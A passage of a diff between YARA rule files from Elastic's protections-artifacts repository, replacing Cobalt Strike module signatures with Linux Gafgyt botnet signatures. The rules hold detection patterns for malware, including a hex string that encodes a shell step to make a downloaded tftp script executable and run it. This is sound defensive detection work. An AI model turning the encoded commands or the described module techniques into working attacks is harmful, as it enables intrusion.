"https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L525-L560" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "a50fd291f5f1bf7ec41b1938a32473a23c3c082018b86eab87aff0d95b26ba06" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L356-L374" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb" + logic_hash = "0e0e901d12edd77e77a205f8547f891f483fc8676493e9b7a324e970225af3c9" score = 75 - quality = 43 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "7823e3b98e55a83bf94b0f07e4c116dbbda35adc09fa0b367f8a978a80c2efff" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\psexec_command.x64.o" ascii fullword - $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\psexec_command.x86.o" ascii fullword - $b1 = "__imp_BeaconDataExtract" ascii fullword - $b2 = "__imp_BeaconDataParse" ascii fullword - $b3 = "__imp_BeaconDataParse" ascii fullword - $b4 = "__imp_BeaconDataParse" ascii fullword - $b5 = "__imp_ADVAPI32$StartServiceA" ascii fullword - $b6 = "__imp_ADVAPI32$DeleteService" ascii fullword - $b7 = "__imp_ADVAPI32$QueryServiceStatus" ascii fullword - $b8 = "__imp_ADVAPI32$CloseServiceHandle" ascii fullword - $c1 = "__imp__BeaconDataExtract" ascii fullword - $c2 = "__imp__BeaconDataParse" ascii fullword - $c3 = "__imp__BeaconDataParse" ascii fullword - $c4 = "__imp__BeaconDataParse" ascii fullword - $c5 = "__imp__ADVAPI32$StartServiceA" ascii fullword - $c6 = "__imp__ADVAPI32$DeleteService" ascii fullword - $c7 = "__imp__ADVAPI32$QueryServiceStatus" ascii fullword - $c8 = "__imp__ADVAPI32$CloseServiceHandle" ascii fullword + $a = { 14 48 63 D0 48 8D 45 C0 48 8D 70 04 48 8B 45 E8 48 8B 40 18 48 } condition: - 1 of ($a*) or 5 of ($b*) or 5 of ($c*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_8A791Eb7 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_750Fe002 : FILE MEMORY { meta: - description = "Identifies Registry module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "8a791eb7-dc0c-4150-9e5b-2dc21af0c77d" - date = "2021-03-23" - modified = "2021-08-23" + id = "750fe002-cac1-4832-94d2-212aa5ec17e3" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L562-L597" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "d1765e6cac9b1560d6484baa1fa5a1bc0b768a72b389c7c6a60e34115669933e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L376-L394" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68" + logic_hash = "eb9907d8a63822c2e3ab57d43dca8ede7876610f029e2f9c10c9eeace9ea0078" score = 75 - quality = 43 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "4967886ba5e663f2e2dc0631939308d7d8f2194a30590a230973e1b91bd625e1" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "f51347158a6477b0da4ed4df3374fbad92b6ac137aa4775f83035d1e30cba7dc" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\registry.x64.o" ascii fullword - $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\registry.x86.o" ascii fullword - $b1 = "__imp_ADVAPI32$RegOpenKeyExA" ascii fullword - $b2 = "__imp_ADVAPI32$RegEnumKeyA" ascii fullword - $b3 = "__imp_ADVAPI32$RegOpenCurrentUser" ascii fullword - $b4 = "__imp_ADVAPI32$RegCloseKey" ascii fullword - $b5 = "__imp_BeaconFormatAlloc" ascii fullword - $b6 = "__imp_BeaconOutput" ascii fullword - $b7 = "__imp_BeaconFormatFree" ascii fullword - $b8 = "__imp_BeaconDataPtr" ascii fullword - $c1 = "__imp__ADVAPI32$RegOpenKeyExA" ascii fullword - $c2 = "__imp__ADVAPI32$RegEnumKeyA" ascii fullword - $c3 = "__imp__ADVAPI32$RegOpenCurrentUser" ascii fullword - $c4 = "__imp__ADVAPI32$RegCloseKey" ascii fullword - $c5 = "__imp__BeaconFormatAlloc" ascii fullword - $c6 = "__imp__BeaconOutput" ascii fullword - $c7 = "__imp__BeaconFormatFree" ascii fullword - $c8 = "__imp__BeaconDataPtr" ascii fullword + $a = { 10 8B 45 0C 40 8A 00 3C FC 75 06 C6 45 FF FE EB 50 8B 45 0C 40 } condition: - 1 of ($a*) or 5 of ($b*) or 5 of ($c*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_D00573A3 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_6122Acdf : FILE MEMORY { meta: - description = "Identifies Screenshot module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "d00573a3-db26-4e6b-aabf-7af4a818f383" - date = "2021-03-23" - modified = "2021-08-23" + id = "6122acdf-1eef-45ea-83ea-699d21c2dc20" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L599-L625" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "e458d41d28b76c989af6385f183f33aa9e11b93e529f032e95bd75433b80bd69" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L396-L413" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "140b32a8f2b7493b068e63a05b3d9baec6ec14c9f2062c7e760dde96335e29f1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b6fa0792b99ea55f359858d225685647f54b55caabe53f58b413083b8ad60e79" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "283275705c729be23d7dc75056388ecae00390bd25ee7b66b0cfc9b85feee212" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "screenshot.x64.dll" ascii fullword - $a2 = "screenshot.dll" ascii fullword - $a3 = "\\\\.\\pipe\\screenshot" ascii fullword - $b1 = "1I1n1Q3M5Q5U5Y5]5a5e5i5u5{5" ascii fullword - $b2 = "GetDesktopWindow" ascii fullword - $b3 = "CreateCompatibleBitmap" ascii fullword - $b4 = "GDI32.dll" ascii fullword - $b5 = "ReflectiveLoader" - $b6 = "Adobe APP14 marker: version %d, flags 0x%04x 0x%04x, transform %d" ascii fullword + $a = { E8 B0 00 FC 8B 7D E8 F2 AE 89 C8 F7 D0 48 48 89 45 F8 EB 03 FF } condition: - 2 of ($a*) or 5 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_7Bcd759C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_A0A4De11 : FILE MEMORY { meta: - description = "Identifies SSH Agent module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "7bcd759c-8e3d-4559-9381-1f4fe8b3dd95" - date = "2021-03-23" - modified = "2021-08-23" + id = "a0a4de11-fe65-449f-a990-ad5f18ac66f0" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L627-L648" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "bfbb8e8009182e87c49242ec3da6e98b23447b646f5c7ea5f97196ae929d7c5f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L415-L433" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417" + logic_hash = "220c6ba82b906f070123b3bae9aafa72c0fb3bc8d5858a4f4bd65567076eb73d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "553085f1d1ca8dcd797360b287951845753eee7370610a1223c815a200a5ed20" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "sshagent.x64.dll" ascii fullword - $a2 = "sshagent.dll" ascii fullword - $b1 = "\\\\.\\pipe\\sshagent" ascii fullword - $b2 = "\\\\.\\pipe\\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii fullword + $a = { 42 0D 83 C8 10 88 42 0D 48 8B 55 D8 0F B6 42 0D 83 C8 08 88 } condition: - 1 of ($a*) and 1 of ($b*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_A56B820F : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_A473Dcb6 : FILE MEMORY { meta: - description = "Identifies Timestomp module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "a56b820f-0a20-4054-9c2d-008862646a78" - date = "2021-03-23" - modified = "2021-08-23" + id = "a473dcb6-887e-4a9a-a1f2-df094f1575b9" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L650-L685" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "52de8110727c29b0f5c75cd470ce6b80ba7821d0ba78ad074536323e2e80b460" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L435-L453" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7ba74e3cb0d633de0e8dbe6cfc49d4fc77dd0c02a5f1867cc4a1f1d575def97d" + logic_hash = "106ee9cd9c368674ae08b835f54dbb6918b553e3097aae9b0de88f55420f046b" score = 75 - quality = 43 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "5418e695bcb1c37e72a7ff24a39219dc12b3fe06c29cedefd500c5e82c362b6d" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "6119a43aa5c9f61249083290293f15696b54b012cdf92553fd49736d40c433f9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\timestomp.x64.o" ascii fullword - $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\timestomp.x86.o" ascii fullword - $b1 = "__imp_KERNEL32$GetFileTime" ascii fullword - $b2 = "__imp_KERNEL32$SetFileTime" ascii fullword - $b3 = "__imp_KERNEL32$CloseHandle" ascii fullword - $b4 = "__imp_KERNEL32$CreateFileA" ascii fullword - $b5 = "__imp_BeaconDataExtract" ascii fullword - $b6 = "__imp_BeaconPrintf" ascii fullword - $b7 = "__imp_BeaconDataParse" ascii fullword - $b8 = "__imp_BeaconDataExtract" ascii fullword - $c1 = "__imp__KERNEL32$GetFileTime" ascii fullword - $c2 = "__imp__KERNEL32$SetFileTime" ascii fullword - $c3 = "__imp__KERNEL32$CloseHandle" ascii fullword - $c4 = "__imp__KERNEL32$CreateFileA" ascii fullword - $c5 = "__imp__BeaconDataExtract" ascii fullword - $c6 = "__imp__BeaconPrintf" ascii fullword - $c7 = "__imp__BeaconDataParse" ascii fullword - $c8 = "__imp__BeaconDataExtract" ascii fullword + $a = { 49 56 04 0B 1E 46 1E B0 EB 10 18 38 38 D7 80 4D 2D 03 29 62 } condition: - 1 of ($a*) or 5 of ($b*) or 5 of ($c*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_92F05172 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_30444846 : FILE MEMORY { meta: - description = "Identifies UAC cmstp module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "92f05172-f15c-4077-a958-b8490378bf08" - date = "2021-03-23" - modified = "2021-08-23" + id = "30444846-439f-41e1-b0b4-c12da774a228" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L687-L716" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "7f0ff4ee14a043d72810826ab9d2b90b0f66724550ba9d3cdd2abe749f4874d0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L455-L473" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c84b81d79d437bb9b8a6bad3646aef646f2a8e1f1554501139648d2f9de561da" + logic_hash = "26bc95efb2ea69fece52cf3ab38ce35891c77fc0dac3e26e5580ba3a88e112e9" score = 75 - quality = 63 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "09b1f7087d45fb4247a33ae3112910bf5426ed750e1e8fe7ba24a9047b76cc82" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "3c74db508de7c8c1c190d5569e0a2c2b806f72045e7b74d44bfbaed20ecb956b" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uaccmstp.x64.o" ascii fullword - $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uaccmstp.x86.o" ascii fullword - $b1 = "elevate_cmstp" ascii fullword - $b2 = "$pdata$elevate_cmstp" ascii fullword - $b3 = "$unwind$elevate_cmstp" ascii fullword - $c1 = "_elevate_cmstp" ascii fullword - $c2 = "__imp__OLE32$CoGetObject@16" ascii fullword - $c3 = "__imp__KERNEL32$GetModuleFileNameA@12" ascii fullword - $c4 = "__imp__KERNEL32$GetSystemWindowsDirectoryA@8" ascii fullword - $c5 = "OLDNAMES" - $c6 = "__imp__BeaconDataParse" ascii fullword - $c7 = "_willAutoElevate" ascii fullword + $a = { 64 20 2B 78 20 74 66 74 70 31 2E 73 68 3B 20 73 68 20 74 66 74 } condition: - 1 of ($a*) or 3 of ($b*) or 4 of ($c*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_417239B5 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_Ea92Cca8 : FILE MEMORY { meta: - description = "Identifies UAC token module from Cobalt Strike" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "417239b5-cf2d-4c85-a022-7a8459c26793" - date = "2021-03-23" - modified = "2021-08-23" + id = "ea92cca8-bba7-4a1c-9b88-a2d051ad0021" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L718-L764" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "fda252747359e677459d82d65c4c9c8f2ff80bc8fd6a38712f858039f3cb8dd1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L475-L492" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "5a9598b3fd37b15444063403a481df1a43894ddcbbd343961e1c770cb74180c9" score = 75 - quality = 51 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "292afee829e838f9623547f94d0561e8a9115ce7f4c40ae96c6493f3cc5ffa9b" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken.x64.o" ascii fullword - $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken.x86.o" ascii fullword - $a3 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken2.x64.o" ascii fullword - $a4 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken2.x86.o" ascii fullword - $b1 = "$pdata$is_admin_already" ascii fullword - $b2 = "$unwind$is_admin" ascii fullword - $b3 = "$pdata$is_admin" ascii fullword - $b4 = "$unwind$is_admin_already" ascii fullword - $b5 = "$pdata$RunAsAdmin" ascii fullword - $b6 = "$unwind$RunAsAdmin" ascii fullword - $b7 = "is_admin_already" ascii fullword - $b8 = "is_admin" ascii fullword - $b9 = "process_walk" ascii fullword - $b10 = "get_current_sess" ascii fullword - $b11 = "elevate_try" ascii fullword - $b12 = "RunAsAdmin" ascii fullword - $b13 = "is_ctfmon" ascii fullword - $c1 = "_is_admin_already" ascii fullword - $c2 = "_is_admin" ascii fullword - $c3 = "_process_walk" ascii fullword - $c4 = "_get_current_sess" ascii fullword - $c5 = "_elevate_try" ascii fullword - $c6 = "_RunAsAdmin" ascii fullword - $c7 = "_is_ctfmon" ascii fullword - $c8 = "_reg_query_dword" ascii fullword - $c9 = ".drectve" ascii fullword - $c10 = "_is_candidate" ascii fullword - $c11 = "_SpawnAsAdmin" ascii fullword - $c12 = "_SpawnAsAdminX64" ascii fullword + $a = { 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64 } condition: - 1 of ($a*) or 9 of ($b*) or 7 of ($c*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_29374056 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_D4227Dbf : FILE MEMORY { meta: - description = "Identifies Cobalt Strike MZ Reflective Loader." + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "29374056-03ce-484b-8b2d-fbf75be86e27" - date = "2021-03-23" - modified = "2021-08-23" + id = "d4227dbf-6ab4-4637-a6ba-0e604acaafb4" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L766-L785" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "09755b23a7057c70f3ea242ec48549de65ebc6f13bdc38cbe22d6d758c3718cf" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L494-L512" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961" + logic_hash = "7953b8d08834315a6ca2c0c8ac1ec7b74a6ffcb71cec4fc053c24e1b59232c0c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4cd7552a499687ac0279fb2e25722f979fc5a22afd1ea4abba14a2ef2002dd0f" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D ?? FF FF FF 48 81 C3 ?? ?? 00 00 FF D3 } - $a2 = { 4D 5A E8 00 00 00 00 5B 89 DF 52 45 55 89 E5 } + $a = { FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00 } condition: - 1 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_949F10E3 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_09C3070E : FILE MEMORY { meta: - description = "Identifies the API address lookup function used by Cobalt Strike along with XOR implementation by Cobalt Strike." + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "949f10e3-68c9-4600-a620-ed3119e09257" - date = "2021-03-25" - modified = "2021-08-23" + id = "09c3070e-4b71-45a0-aa62-0cc6e496644a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L787-L806" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "e4b726c83013f4b9c9d61683f78a4a91935225e9ed3de0ce164b96b5a6719579" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L514-L532" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" + logic_hash = "f8f8e8883cf1e51fbaef81b8334ac5fa45a54682d285282da62c80e4aa50a48d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "34e04901126a91c866ebf61a61ccbc3ce0477d9614479c42d8ce97a98f2ce2a7" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61 } - $a2 = { 8B 07 01 C3 85 C0 75 E5 58 C3 E8 [2] FF FF 31 39 32 2E 31 36 38 2E ?? 2E } + $a = { 48 C1 E8 06 48 89 C6 48 8B 94 C5 50 FF FF FF 8B 8D 2C FF FF FF 83 } condition: all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_8751Cdf9 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_Fa19B8Fc : FILE MEMORY { meta: - description = "Identifies Cobalt Strike wininet reverse shellcode along with XOR implementation by Cobalt Strike." + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "8751cdf9-4038-42ba-a6eb-f8ac579a4fbb" - date = "2021-03-25" - modified = "2021-08-23" + id = "fa19b8fc-6035-4415-842f-4993411ab43e" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L808-L827" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "64fae95fd89ad46a50a00c943cf98a997a0842a83be64b3728b25151867b75a8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L534-L552" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a7cfc16ec33ec633cbdcbff3c4cefeed84d7cbe9ca1f4e2a3b3e43d39291cd6b" + logic_hash = "cddf3b9948b9bc685ff7d4c00377d0f80861169707777022297e549bd166dbf0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0988386ef4ba54dd90b0cf6d6a600b38db434e00e569d69d081919cdd3ea4d3f" - threat_name = "Windows.Trojan.CobaltStrike" - severity = 99 + fingerprint = "4f213d5d1b4a0b832ed7a6fac91bef7c29117259b775b85409e9e4c8aec2ad10" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 } - $a2 = { 8B 07 01 C3 85 C0 75 E5 58 C3 E8 [2] FF FF 31 39 32 2E 31 36 38 2E ?? 2E } + $a = { 02 63 10 01 0F 4B 85 14 36 B0 60 53 03 4F 0D B2 05 76 02 B7 00 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_663Fc95D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_Eaa9A668 : FILE MEMORY { meta: - description = "Identifies CobaltStrike via unidentified function code" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "663fc95d-2472-4d52-ad75-c5d86cfc885f" - date = "2021-04-01" - modified = "2021-12-17" + id = "eaa9a668-e3b9-4657-81bf-1c6456e2053a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CobaltStrike.yar#L829-L847" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "842a0a372cfb2316293f4a08e1690194fa98368a9f6ffe9c63222b2c4ab6532c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L554-L572" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "409c55110d392aed1a9ec98a6598fb8da86ab415534c8754aa48e3949e7c4b62" + logic_hash = "05e9047342a9d081a09f8514f0ec32d72bc43a286035014ada90b0243f92cfa8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48" - threat_name = "Windows.Trojan.CobaltStrike" + fingerprint = "bee2744457164e5747575a101026c7862474154d82f52151ac0d77fb278d9405" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00 } + $a = { 45 C0 0F B6 00 3C 2F 76 0B 48 8B 45 C0 0F B6 00 3C 39 76 C7 48 8B } condition: all of them } -rule ELASTIC_Windows_Trojan_Cobaltstrike_B54B94Ac : FILE MEMORY +rule 